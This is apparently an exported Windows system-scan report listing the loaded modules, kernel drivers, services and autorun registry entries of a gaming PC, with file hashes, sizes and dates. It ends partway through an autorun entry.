1668677632Steamclient.dllCopyright (C) 2005 Valve CorporationMD5=B70A3826FE95EB6E0D3D86D5314D4539
18874.35 kb, rsAh, created: 21.04.2020 17:33:18, modified: 21.07.2023 14:04:20
13792
C:\Program Files (x86)\Steam\steamui.dll
Script: Quarantine, Delete, Delete via BC
1723334656SteamUI Dynamic Link LibraryCopyright (C) 2007MD5=9439DB24EB975CB006C85FF78B04A751
14135.35 kb, rsAh, created: 21.04.2020 17:33:18, modified: 21.07.2023 14:04:18
13792
C:\Program Files (x86)\Steam\tier0_s.dll
Script: Quarantine, Delete, Delete via BC
1767309312tier0_s Dynamic Link LibraryCopyright (C) 2007MD5=A916FDF39F909EA99A525487AF4799EC
341.35 kb, rsAh, created: 21.04.2020 17:33:18, modified: 21.07.2023 14:04:20
13792
C:\Program Files (x86)\Steam\video.dll
Script: Quarantine, Delete, Delete via BC
1712521216  MD5=A4CB105E562D58F47E63F89894D31EE6
3757.35 kb, rsAh, created: 21.04.2020 17:33:19, modified: 21.07.2023 14:04:20
13792
C:\Program Files (x86)\Steam\vstdlib_s.dll
Script: Quarantine, Delete, Delete via BC
1764884480vstdlib_ s.dllCopyright (C) 2005 Valve CorporationMD5=6B25FD6DF4032786A14F4D334A0F5248
530.35 kb, rsAh, created: 21.04.2020 17:33:18, modified: 21.07.2023 14:04:20
13792
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\X86\MPCLIENT.DLL
Script: Quarantine, Delete, Delete via BC
1793130496Client Interface© Microsoft Corporation. All rights reserved.MD5=619954A4C720E7EBF97481D0891F6B25
925.77 kb, rsAh, created: 13.06.2023 20:41:36, modified: 13.06.2023 20:41:33
17660, 16056, 17304, 19404, 13340, 16812, 16700, 15860, 13932, 16816
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\X86\MpOav.dll
Script: Quarantine, Delete, Delete via BC
1822031872IOfficeAntiVirus Module© Microsoft Corporation. All rights reserved.MD5=FDF32B91DD2C422169F7B7CB120E1B93
424.77 kb, rsAh, created: 13.06.2023 20:41:36, modified: 13.06.2023 20:41:33
13820, 24968, 1344, 16716, 17660, 17504, 16056, 17304, 19404, 13340, 16812, 16700, 13792, 15860, 13932, 16816
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\ffmpeg.dll
Script: Quarantine, Delete, Delete via BC
1753022464  MD5=4127E49E61EBF6E9A747FBE5B5774EF1
3178.77 kb, rsAh, created: 12.07.2023 17:42:12, modified: 12.07.2023 17:42:12
1344, 9696, 20784, 10048, 9212, 19796
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_cloudsync-1\discord_cloudsync\discord_cloudsync.node
Script: Quarantine, Delete, Delete via BC
1593114624  MD5=313D12E65D76F21005EDF179F2EAB297
3707.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_dispatch-1\discord_dispatch\discord_dispatch.node
Script: Quarantine, Delete, Delete via BC
737411072  MD5=27B3BDE3EC2979744A9B821B6592FD54
8256.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_erlpack-1\discord_erlpack\discord_erlpack.node
Script: Quarantine, Delete, Delete via BC
1634861056  MD5=F11F433578F4EB0D776D5F88D49B338D
412.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_game_utils-1\discord_game_utils\discord_game_utils.node
Script: Quarantine, Delete, Delete via BC
1618804736  MD5=76A754956F8EDCCF10286559DB124036
796.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_krisp-1\discord_krisp\discord_krisp.node
Script: Quarantine, Delete, Delete via BC
397869056  MD5=5AD611A64BCCF053AB8962FF90D78492
21323.27 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_media-1\discord_media\discord_media.node
Script: Quarantine, Delete, Delete via BC
603193344  MD5=F858A80BA489FAB911C8A136D0CE6790
572.27 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_modules-1\discord_modules\discord_modules.node
Script: Quarantine, Delete, Delete via BC
1523187712  MD5=3286608F45F872B657BA12BE0E074E56
373.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_overlay2-1\discord_overlay2\discord_overlay2.node
Script: Quarantine, Delete, Delete via BC
1592524800  MD5=BF579436AA59861D2C75735F90670AD1
550.27 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_spellcheck-1\discord_spellcheck\node_modules\cld\build\Release\cld.node
Script: Quarantine, Delete, Delete via BC
1628438528  MD5=9804C885A999AB50C55822279C126DF2
2652.27 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_utils-1\discord_utils\discord_utils.node
Script: Quarantine, Delete, Delete via BC
1635319808  MD5=A76F9493F5952B81D9DD91BCEBFE645E
606.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_utils-1\discord_utils\node_modules\macos-notification-state\build\Release\notificationstate.node
Script: Quarantine, Delete, Delete via BC
1636499456  MD5=8602CDD374996BA336802ADFC3ED86D6
449.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_utils-1\discord_utils\node_modules\windows-notification-state\build\Release\notificationstate.node
Script: Quarantine, Delete, Delete via BC
1635975168  MD5=2F01C06C9ABB27F410CB3622A4DB5E0D
470.27 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_utils-1\discord_utils\node_modules\windows-quiet-hours\build\Release\quiethours.node
Script: Quarantine, Delete, Delete via BC
1627389952  MD5=DE8ECE5006910B83E104551CABEF10E4
456.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_voice-2\discord_voice\discord_voice.node
Script: Quarantine, Delete, Delete via BC
1649344512  MD5=5FE367F5109BE16151211A23197D4028
14504.77 kb, rsAh, created: 14.07.2023 12:45:50, modified: 14.07.2023 12:45:50
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_voice-2\discord_voice\mediapipe.dll
Script: Quarantine, Delete, Delete via BC
1641611264  MD5=875B1C9C331DA3847383AA73A8BFED07
5138.77 kb, rsAh, created: 14.07.2023 12:45:50, modified: 14.07.2023 12:45:50
1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\updater.node
Script: Quarantine, Delete, Delete via BC
1749483520  MD5=A91C4977FDFC95C496A9A184354023ED
3456.77 kb, rsAh, created: 12.07.2023 17:42:12, modified: 12.07.2023 17:42:12
20784
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\vk_swiftshader.dll
Script: Quarantine, Delete, Delete via BC
1738080256SwiftShader Vulkan 32-bit Dynamic Link LibraryCopyright (C) 2018 Google Inc.MD5=B377B0371BA91B4FE533D5C302A7F002
4400.77 kb, rsAh, created: 12.07.2023 17:42:12, modified: 12.07.2023 17:42:12
19796
C:\WINDOWS\SYSTEM32\MSVCP140.dll
Script: Quarantine, Delete, Delete via BC
1849229312Microsoft® C Runtime Library© Microsoft Corporation. All rights reserved.MD5=DC739066C9D0CA961CBA2F320CADE28E
437.90 kb, rsAh, created: 10.05.2023 07:02:12, modified: 10.05.2023 07:02:12
5200, 13792
C:\WINDOWS\SYSTEM32\VCRUNTIME140.dll
Script: Quarantine, Delete, Delete via BC
1849688064Microsoft® C Runtime Library© Microsoft Corporation. All rights reserved.MD5=1D4FF3CF64AB08C66AE9A4013C89A3AC
88.40 kb, rsAh, created: 10.05.2023 07:02:12, modified: 10.05.2023 07:02:12
5200, 13792
Modules found:347, recognized as trusted 298

Kernel Space Modules Viewer

Module Redirector Base address Size in memory Description Manufacturer
C:\WINDOWS\system32\drivers\wd\WdFilter.sys
487.25 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33
Script: Quarantine, Delete, Delete via BC
x64292C00000007E000 (516096)Microsoft antimalware file system filter driver© Microsoft Corporation. All rights reserved.
C:\Program Files\Riot Vanguard\vgk.sys
22855.19 kb, rsAh, created: 12.08.2020 12:52:11, modified: 19.06.2023 04:03:40
Script: Quarantine, Delete, Delete via BC
x644256000001624000 (23216128)Vanguard kernel-mode driver.Copyright (C) 2021
C:\WINDOWS\System32\Drivers\dump_dumpstorport.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x646EF6000000011000 (69632)  
C:\WINDOWS\System32\drivers\dump_stornvme.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x646EFC00000003B000 (241664)  
C:\WINDOWS\System32\Drivers\dump_dumpfve.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x646A3800000001E000 (122880)  
C:\WINDOWS\system32\drivers\wd\WdNisDrv.sys
97.23 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33
Script: Quarantine, Delete, Delete via BC
x64461900000001C000 (114688)Windows Defender Network Stream Filter© Microsoft Corporation. All rights reserved.
C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{A3E1BB73-60A5-490A-855B-BEC991156312}\MpKslDrv.sys
216.29 kb, rsAh, created: 23.07.2023 13:25:50, modified: 23.07.2023 13:25:50
Script: Quarantine, Delete, Delete via BC
x648CF500000003A000 (237568)KSLD© Microsoft Corporation. All rights reserved.
Items found - 226, recognized as trusted - 219

Services

Service Description Status File name Redirector Description Manufacturer Group Dependencies
Apple Mobile Device Service
Service: Stop, Delete, Disable, Delete via BC
Apple Mobile Device ServiceRunningC:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
100.84 kb, rsAh, created: 08.10.2022 03:00:46, modified: 08.10.2022 03:00:46
Script: Quarantine, Delete, Delete via BC
x64MobileDeviceService© 2022 Apple Inc. All rights reserved. Tcpip
BEService
Service: Stop, Delete, Disable, Delete via BC
BattlEye ServiceNot startedC:\Program Files (x86)\Common Files\BattlEye\BEService.exe
9649.26 kb, rsAh, created: 03.05.2020 14:50:45, modified: 11.01.2023 17:05:22
Script: Quarantine, Delete, Delete via BC
x64    
bookingdesktopapp
Service: Stop, Delete, Disable, Delete via BC
bookingDesktopApp Update Service (bookingdesktopapp)RunningC:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe
100.00 kb, rsAh, created: 29.09.2020 19:53:40, modified: 29.09.2020 19:53:39
Script: Quarantine, Delete, Delete via BC
x64bookingDesktopApp UpdateCopyright 2007-2010 Google Inc. RPCSS
bookingdesktopappm
Service: Stop, Delete, Disable, Delete via BC
bookingDesktopApp Update Service (bookingdesktopappm)Not startedC:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe
100.00 kb, rsAh, created: 29.09.2020 19:53:40, modified: 29.09.2020 19:53:39
Script: Quarantine, Delete, Delete via BC
x64bookingDesktopApp UpdateCopyright 2007-2010 Google Inc. RPCSS
CAMService
Service: Stop, Delete, Disable, Delete via BC
CAM ServiceRunningC:\Program Files\NZXT CAM\resources\app.asar.unpacked\node_modules\@nzxt\cam-core\dist\target\x86_64-pc-windows-msvc\release\service.exe
632.94 kb, rsAh, created: 06.07.2023 00:16:45, modified: 05.07.2023 11:34:42
Script: Quarantine, Delete, Delete via BC
x64    
EABackgroundService
Service: Stop, Delete, Disable, Delete via BC
EABackgroundServiceNot startedC:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe
11234.60 kb, rsAh, created: 15.07.2023 00:27:25, modified: 15.07.2023 00:27:26
Script: Quarantine, Delete, Delete via BC
x64EA Background ServiceCopyright (c) 2023  
EasyTuneEngineService
Service: Stop, Delete, Disable, Delete via BC
EasyTune EngineRunningC:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\EasyTuneEngineService.exe
141.22 kb, rsAh, created: 05.11.2020 17:43:28, modified: 05.11.2020 17:43:28
Script: Quarantine, Delete, Delete via BC
x64EasyTuneEngineServiceCopyright © 2014 GIGA-BYTE TECHNOLOGY CO., LTD.  
EpicOnlineServices
Service: Stop, Delete, Disable, Delete via BC
Epic Online ServicesNot startedC:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe
912.45 kb, rsAh, created: 27.08.2022 00:27:16, modified: 11.07.2022 16:58:56
Script: Quarantine, Delete, Delete via BC
x64Epic Online Services HostCopyright (c) 2008-2021 Epic Games, Inc., Kohsuke Kawaguchi, Sun Microsystems, Inc., CloudBees, Inc., Oleg Nenashev and other contributors  
EQU8_36
Service: Stop, Delete, Disable, Delete via BC
EQU8_36Not startedC:\ProgramData\EQU8\Splitgate\bin\anticheat.x64.equ8.exe
5892.14 kb, rsAh, created: 25.07.2021 19:28:09, modified: 25.07.2021 15:56:57
Script: Quarantine, Delete, Delete via BC
x64EQU8 Anti-CheatCopyright (C) 2021 - Int3 Software AB  
GameInput Service
Service: Stop, Delete, Disable, Delete via BC
GameInput ServiceRunningC:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe
89.50 kb, rsAh, created: 26.02.2023 04:38:52, modified: 26.02.2023 04:38:52
Script: Quarantine, Delete, Delete via BC
x64GameInput Host Service© Microsoft Corporation. All rights reserved.  
GamingServices
Service: Stop, Delete, Disable, Delete via BC
Gaming ServicesRunningC:\Program Files\WindowsApps\Microsoft.GamingServices_10.75.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe
73.45 kb, rsAh, created: 17.03.2023 02:07:08, modified: 17.03.2023 02:07:10
Script: Quarantine, Delete, Delete via BC
x64GamingServices© Microsoft Corporation. All rights reserved. staterepository
GamingServicesNet
Service: Stop, Delete, Disable, Delete via BC
Gaming ServicesRunningC:\Program Files\WindowsApps\Microsoft.GamingServices_10.75.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
73.45 kb, rsAh, created: 17.03.2023 02:07:08, modified: 17.03.2023 02:07:10
Script: Quarantine, Delete, Delete via BC
x64GamingServices© Microsoft Corporation. All rights reserved. staterepository
GbtCareBotService
Service: Stop, Delete, Disable, Delete via BC
GbtCareBotServiceRunningC:\Program Files (x86)\GIGABYTE\SmartSurvey\GbtCareBotService.exe
134.92 kb, rsAh, created: 06.09.2018 15:53:26, modified: 06.09.2018 15:53:26
Script: Quarantine, Delete, Delete via BC
x64GbtCareBotServiceCopyright © 2018 GIGA-BYTE TECHNOLOGY CO., LTD.  
GoogleChromeElevationService
Service: Stop, Delete, Disable, Delete via BC
Google Chrome Elevation Service (GoogleChromeElevationService)Not startedC:\Program Files (x86)\Google\Chrome\Application\114.0.5735.248\elevation_service.exe
1701.77 kb, rsAh, created: 20.07.2023 20:42:27, modified: 20.07.2023 08:58:27
Script: Quarantine, Delete, Delete via BC
x64Google ChromeCopyright 2023 Google LLC. All rights reserved. RPCSS
LGHUBUpdaterService
Service: Stop, Delete, Disable, Delete via BC
LGHUB Updater ServiceRunningC:\Program Files\LGHUB\lghub_updater.exe
10341.75 kb, rsAh, created: 23.06.2023 12:22:50, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC
x64LGHUB UpdaterCopyright © Logitech, Inc. 2023  
MicrosoftEdgeElevationService
Service: Stop, Delete, Disable, Delete via BC
Microsoft Edge Elevation Service (MicrosoftEdgeElevationService)Not startedC:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\elevation_service.exe
1709.45 kb, rsAh, created: 23.07.2023 03:50:03, modified: 21.07.2023 02:00:56
Script: Quarantine, Delete, Delete via BC
x64Microsoft EdgeCopyright Microsoft Corporation. All rights reserved. RPCSS
OcButtonService
Service: Stop, Delete, Disable, Delete via BC
OcButtonServiceNot startedC:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\OcButtonService.exe
122.72 kb, rsAh, created: 03.11.2020 10:51:22, modified: 03.11.2020 10:51:22
Script: Quarantine, Delete, Delete via BC
x64OcButtonServiceCopyright © 2015 GIGA-BYTE TECHNOLOGY CO., LTD.  
OverwolfUpdater
Service: Stop, Delete, Disable, Delete via BC
Overwolf Updater Windows SCMNot startedC:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe
2579.51 kb, rsAh, created: 16.07.2023 07:11:00, modified: 16.07.2023 07:11:00
Script: Quarantine, Delete, Delete via BC
x64OverwolfUpdaterCopyright Overwolf © 2023  
OVRLibraryService
Service: Stop, Delete, Disable, Delete via BC
Oculus VR Library ServiceNot startedD:\Oculus\Support\oculus-librarian\OVRLibraryService.exe
144.55 kb, rsAh, created: 06.07.2023 17:33:53, modified: 06.07.2023 17:33:54
Script: Quarantine, Delete, Delete via BC
x64OVRLibraryServiceCopyright © Facebook Technologies, LLC  
OVRService
Service: Stop, Delete, Disable, Delete via BC
Oculus VR Runtime ServiceRunningD:\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe
497.05 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14
Script: Quarantine, Delete, Delete via BC
x64OVR Service LauncherCopyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.  
Rockstar Service
Service: Stop, Delete, Disable, Delete via BC
Rockstar Game Library ServiceNot startedC:\Program Files\Rockstar Games\Launcher\RockstarService.exe
2167.40 kb, rsAh, created: 16.02.2021 07:27:30, modified: 04.06.2021 23:13:04
Script: Quarantine, Delete, Delete via BC
x64Rockstar Games Launcher ServiceRockstar Games Inc. (C) 2005-2021 Take Two Interactive. All rights reserved  
sherpa_service
Service: Stop, Delete, Disable, Delete via BC
Blue Sherpa serviceRunningC:\Program Files\Blue Sherpa\sherpa_service.exe
339.92 kb, rsAh, created: 01.08.2020 11:58:35, modified: 01.08.2020 11:58:35
Script: Quarantine, Delete, Delete via BC
x64    
Steam Client Service
Service: Stop, Delete, Disable, Delete via BC
Steam Client ServiceRunningC:\Program Files (x86)\Common Files\Steam\SteamService.exe
2600.35 kb, rsAh, created: 21.04.2020 17:32:29, modified: 21.07.2023 14:04:18
Script: Quarantine, Delete, Delete via BC
x64Steam Client ServiceCopyright (C) Valve Corporation  
Updater
Service: Stop, Delete, Disable, Delete via BC
UpdaterNot startedC:\Program Files\Virtual Desktop Streamer\Updater.exe
1136.21 kb, rsAh, created: 18.12.2022 19:38:44, modified: 18.12.2022 19:38:44
Script: Quarantine, Delete, Delete via BC
x64Updater 1.25.10Copyright (C) 2022 Virtual Desktop, Inc.  
vgc
Service: Stop, Delete, Disable, Delete via BC
vgcNot startedC:\Program Files\Riot Vanguard\vgc.exe
10789.01 kb, rsAh, created: 12.08.2020 12:52:11, modified: 19.06.2023 10:52:25
Script: Quarantine, Delete, Delete via BC
x64Vanguard user-mode service.Copyright (C) 2021  
VirtualDesktop.Service.exe
Service: Stop, Delete, Disable, Delete via BC
Virtual Desktop ServiceRunningC:\Program Files\Virtual Desktop\VirtualDesktop.Service.exe
10407.71 kb, rsAh, created: 16.12.2022 13:24:54, modified: 16.12.2022 13:24:54
Script: Quarantine, Delete, Delete via BC
x64Virtual Desktop ServiceCopyright © Virtual Desktop, Inc. 2014-2022  
WdNisSvc
Service: Stop, Delete, Disable, Delete via BC
Microsoft Defender Antivirus Network Inspection ServiceRunningC:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\NisSrv.exe
3156.81 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33
Script: Quarantine, Delete, Delete via BC
x64Microsoft Network Realtime Inspection Service© Microsoft Corporation. All rights reserved. WdNisDrv
WinDefend
Service: Stop, Delete, Disable, Delete via BC
Microsoft Defender Antivirus ServiceRunningC:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MsMpEng.exe
130.46 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33
Script: Quarantine, Delete, Delete via BC
x64Antimalware Service Executable© Microsoft Corporation. All rights reserved. RpcSs
Items found - 305, recognized as trusted - 277

Drivers

Service Description Status File name Redirector Description Manufacturer Group Dependencies
EQU8_HELPER_36
Driver: Unload, Delete, Disable, Delete via BC
EQU8_HELPER_36Not startedC:\WINDOWS\system32\DRIVERS\EQU8_HELPER_36.sys
37.14 kb, rsAh, created: 25.07.2021 19:28:10, modified: 18.08.2021 13:05:32
Script: Quarantine, Delete, Delete via BC
x64    
iaLPSS2_GPIO2
Driver: Unload, Delete, Disable, Delete via BC
Intel(R) Serial IO GPIO Driver v2Not startedC:\WINDOWS\System32\drivers\iaLPSS2_GPIO2.sys
126.50 kb, rsAh, created: 27.01.2019 23:28:02, modified: 27.01.2019 23:28:02
Script: Quarantine, Delete, Delete via BC
x64Intel(R) Serial IO GPIO Driver v2Copyright © 2015, Intel Corporation.Extended Base 
MpKsl8d91288d
Driver: Unload, Delete, Disable, Delete via BC
MpKsl8d91288dNot startedC:\ProgramData\Microsoft\Windows Defender\Definition Updates\{643F9B41-4B05-4C7D-AA03-8E842C38279A}\MpKslDrv.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x64    
RzDev_022b
Driver: Unload, Delete, Disable, Delete via BC
Razer 022b ServiceNot startedC:\WINDOWS\System32\drivers\RzDev_022b.sys
51.06 kb, rsAh, created: 17.02.2020 10:29:26, modified: 17.02.2020 10:29:26
Script: Quarantine, Delete, Delete via BC
x64Razer Device DriverCopyright © 2020 Razer Inc. All rights reserved  
SIVDriver
Driver: Unload, Delete, Disable, Delete via BC
SIV Kernel DriverNot startedC:\WINDOWS\system32\Drivers\SIVX64.sys
200.73 kb, rsAh, created: 23.07.2023 02:00:44, modified: 23.07.2023 01:54:35
Script: Quarantine, Delete, Delete via BC
x64System Information Viewer X64 DriverCopyright© Ray Hinchliffe 2001-2021  
vgk
Driver: Unload, Delete, Disable, Delete via BC
vgkRunningC:\Program Files\Riot Vanguard\vgk.sys
22855.19 kb, rsAh, created: 12.08.2020 12:52:11, modified: 19.06.2023 04:03:40
Script: Quarantine, Delete, Delete via BC
x64Vanguard kernel-mode driver.Copyright (C) 2021System Reserved 
WdBoot
Driver: Unload, Delete, Disable, Delete via BC
Microsoft Defender Antivirus Boot DriverNot startedC:\WINDOWS\system32\drivers\wd\WdBoot.sys
48.40 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33
Script: Quarantine, Delete, Delete via BC
x64Microsoft antimalware boot driver© Microsoft Corporation. All rights reserved.Early-Launch 
WdFilter
Driver: Unload, Delete, Disable, Delete via BC
Microsoft Defender Antivirus Mini-Filter DriverRunningC:\WINDOWS\system32\drivers\wd\WdFilter.sys
487.25 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33
Script: Quarantine, Delete, Delete via BC
x64Microsoft antimalware file system filter driver© Microsoft Corporation. All rights reserved.FSFilter Anti-VirusFltMgr
WdNisDrv
Driver: Unload, Delete, Disable, Delete via BC
Microsoft Defender Antivirus Network Inspection System DriverRunningC:\WINDOWS\system32\drivers\wd\WdNisDrv.sys
97.23 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33
Script: Quarantine, Delete, Delete via BC
x64Windows Defender Network Stream Filter© Microsoft Corporation. All rights reserved. BFE
WinSetupMon
Driver: Unload, Delete, Disable, Delete via BC
WinSetupMonNot startedC:\WINDOWS\system32\DRIVERS\WinSetupMon.sys
error getting file info
Script: Quarantine, Delete, Delete via BC
x64  FSFilter SystemFltMgr
MpKsl4237837f
Driver: Unload, Delete, Disable, Delete via BC
MpKsl4237837fRunningC:\ProgramData\Microsoft\Windows Defender\Definition Updates\{A3E1BB73-60A5-490A-855B-BEC991156312}\MpKslDrv.sys
216.29 kb, rsAh, created: 23.07.2023 13:25:50, modified: 23.07.2023 13:25:50
Script: Quarantine, Delete, Delete via BC
x64KSLD© Microsoft Corporation. All rights reserved.  
Items found - 416, recognized as trusted - 405

Autoruns

File name Redirector Startup method Description
C:\Program Files\NZXT CAM\resources\app.asar.unpacked\node_modules\@nzxt\cam-core\dist\target\x86_64-pc-windows-msvc\release\service.exe
632.94 kb, rsAh, created: 06.07.2023 00:16:45, modified: 05.07.2023 11:34:42
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\CAM Service, EventMessageFile
C:\Windows\System32\icardres.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\CardSpace 4.0.0.0, EventMessageFile
C:\Windows\System32\icardres.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\CardSpace 4.0.0.0, CategoryMessageFile
C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.248\eventlog_provider.dll
16.77 kb, rsAh, created: 20.07.2023 20:42:27, modified: 20.07.2023 08:58:28
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Chrome, EventMessageFile
C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.248\eventlog_provider.dll
16.77 kb, rsAh, created: 20.07.2023 20:42:27, modified: 20.07.2023 08:58:28
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Chrome, CategoryMessageFile
C:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\eventlog_provider.dll
16.45 kb, rsAh, created: 23.07.2023 03:50:03, modified: 21.07.2023 02:01:25
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Edge, EventMessageFile
C:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\eventlog_provider.dll
16.45 kb, rsAh, created: 23.07.2023 03:50:03, modified: 21.07.2023 02:01:25
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Edge, CategoryMessageFile
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.177.11\msedgeupdate.dll
2121.97 kb, rsAh, created: 06.07.2023 13:24:47, modified: 06.07.2023 13:24:47
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\edgeupdate, EventMessageFile
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.177.11\msedgeupdate.dll
2121.97 kb, rsAh, created: 06.07.2023 13:24:47, modified: 06.07.2023 13:24:47
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\edgeupdatem, EventMessageFile
C:\Program Files\Common Files\Microsoft Shared\Ink\IPSEventLogMsg.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Handwriting Recognition, EventMessageFile
C:\Program Files\Common Files\Microsoft Shared\Ink\IPSEventLogMsg.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Handwriting Recognition, CategoryMessageFile
C:\WINDOWS\System32\IusEventLog.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Intel(R) Capability Licensing Service Interface, EventMessageFile
C:\WINDOWS\System32\UI0Detect.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Interactive Services detection, EventMessageFile
C:\Windows\System32\fxsevent.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft Fax, EventMessageFile
C:\Windows\System32\fxsevent.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft Fax, CategoryMessageFile
C:\WINDOWS\system32\perfctrs.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Registry keyHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft-Windows-PerfCtrs, EventMessageFile
C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_3c2bd4a1ec6d228e\nvoglv64.dll
error getting file info
Script: Quarantine, Delete, Delete via BC
